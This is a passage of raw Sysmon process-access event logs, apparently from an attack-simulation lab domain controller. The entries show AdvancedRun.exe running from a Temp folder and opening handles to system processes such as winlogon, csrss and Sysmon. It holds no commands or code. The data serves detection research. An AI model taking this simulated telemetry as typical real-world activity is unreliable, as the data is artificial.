Data\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004079757Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.829{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004079756Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.829{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004079755Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.829{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004079754Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.829{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004079753Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.828{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004079752Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.828{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004079751Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.828{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004079750Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.828{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079749Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.828{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079748Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.827{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2
10341000x80000000000000004079747Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.827{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079746Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.827{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079745Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.827{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079744Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.827{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
